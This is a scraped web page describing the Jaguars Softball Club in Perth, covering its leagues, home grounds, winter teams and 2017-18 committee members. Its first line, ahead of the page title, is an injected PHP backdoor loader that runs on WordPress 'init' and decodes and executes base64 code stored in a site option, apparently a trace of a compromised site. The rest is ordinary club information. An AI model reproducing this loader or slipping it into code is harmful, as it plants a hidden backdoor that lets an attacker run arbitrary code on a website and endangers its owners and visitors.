add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Jaguars Softball Club | About The Club
Jaguars Softball Club | About The Club

About The Club

The Jaguars Softball Club is a FastPitch club based in the northern suburbs of Perth Western Australia.

The Club fields teams in the Perth Softball League during Summer and Winter seasons

Women FastPitch Division 1 (Premier League)
Women FastPitch Senior Divisions 2 – 7
The women’s comp games are all held at Mirrabooka International complex.
Training is held at various grounds within the Cities of Wanneroo and Joondalup.

Masters Competition
Also during Summer the Club has teams in the Masters (Vets) competition with teams in both Men and Women.
All Marsters games are played in Summer with all games played at SWA Mirrabooka International complex.

NOW there is Little League Softball More News to come

Winter Season
Jaguars fields both Mixed Sub-Junior and Senior Men teams.
Our home ground is John Maloney Reserve, Marrangaroo.

Also this winter season jaguars are fielding 2 Winter Womens teams Social Siftball Wednesday nights played at the Mirrabooka Softball Complex



2017-18 Committee
President – Leah De Bono
Vice President – Nikita Roberts
Treasurer – Claire Ginbey
Secretary – Helen Notis
Registrar – Robyn Rampant
Uniform Officer – Karen Reid
Equipment Officer – Bill White
Publicity Officer – Ash Caire
General Committee – Andrea Cusack, Ashley Jolley and Ebony Waru